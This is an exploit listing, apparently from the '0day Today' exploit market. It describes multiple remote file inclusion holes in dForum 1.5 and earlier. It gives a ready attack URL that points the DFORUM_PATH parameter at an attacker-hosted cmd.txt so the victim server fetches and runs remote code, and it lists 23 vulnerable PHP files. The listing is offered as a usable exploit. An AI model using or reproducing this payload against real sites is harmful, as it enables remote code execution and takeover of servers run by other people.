[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions

Author
nukedx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-375
Category
web applications
Date add
20-04-2006
Platform
unsorted
===========================================================
dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions
===========================================================





dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php


#  0day.today [2024-11-15]  #